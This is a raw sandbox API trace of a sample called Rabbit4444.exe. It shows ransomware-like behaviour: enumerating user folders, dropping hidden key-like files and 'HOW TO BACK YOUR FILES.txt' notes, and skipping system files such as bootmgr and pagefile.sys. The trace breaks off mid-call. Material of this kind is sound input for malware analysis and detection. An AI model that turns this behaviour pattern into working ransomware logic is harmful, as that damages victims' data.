(lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.042] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.042] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.042] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4d6014, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4d6014, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.042] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.042] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.042] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4d6014, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4d6014, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.042] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0062.042] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.043] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.043] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.043] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.043] CloseHandle (hObject=0x298) returned 1 [0062.043] CloseHandle (hObject=0x27c) returned 1 [0062.044] GetCurrentThreadId () returned 0xd98 [0062.044] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0062.044] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache" [0062.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123038 | out: hHeap=0xe0000) returned 1 [0062.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0062.044] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache" [0062.044] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\" [0062.044] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0062.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.045] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.048] FlushFileBuffers (hFile=0x27c) returned 1 [0062.049] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.049] CloseHandle (hObject=0x27c) returned 1 [0062.049] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache") returned 94 [0062.050] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.050] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.050] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.050] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.050] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.050] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.050] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.050] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.050] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.050] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.050] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4d6014, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4d6014, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.050] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.050] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4d6014, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4d6014, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4d6014, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.050] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.050] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.051] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.051] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.051] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.051] CloseHandle (hObject=0x298) returned 1 [0062.051] CloseHandle (hObject=0x27c) returned 1 [0062.052] GetCurrentThreadId () returned 0xd98 [0062.052] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0062.052] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData" [0062.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e368 | out: hHeap=0xe0000) returned 1 [0062.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0062.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData" [0062.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\" [0062.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0062.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.053] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.055] FlushFileBuffers (hFile=0x27c) returned 1 [0062.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.056] CloseHandle (hObject=0x27c) returned 1 [0062.057] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData") returned 91 [0062.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.057] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0062.057] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.057] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.057] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.057] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.057] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.057] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.057] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.057] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.057] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.057] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.057] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4fc248, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4fc248, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.057] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4fc248, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4fc248, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.057] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0062.057] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.058] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.058] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.059] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.059] CloseHandle (hObject=0x298) returned 1 [0062.059] CloseHandle (hObject=0x27c) returned 1 [0062.059] GetCurrentThreadId () returned 0xd98 [0062.059] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0062.059] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC" [0062.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1245e8 | out: hHeap=0xe0000) returned 1 [0062.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0062.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC" [0062.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\" [0062.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0062.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.061] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.063] FlushFileBuffers (hFile=0x27c) returned 1 [0062.065] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.065] CloseHandle (hObject=0x27c) returned 1 [0062.073] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC") returned 86 [0062.073] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.073] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf22e0430, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.074] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.074] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.074] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.074] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.074] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf22e0430, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.074] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.074] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.074] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.074] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.074] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.074] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee4fc248, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee4fc248, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee4fc248, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.074] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0062.074] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0062.074] lstrcmpiW 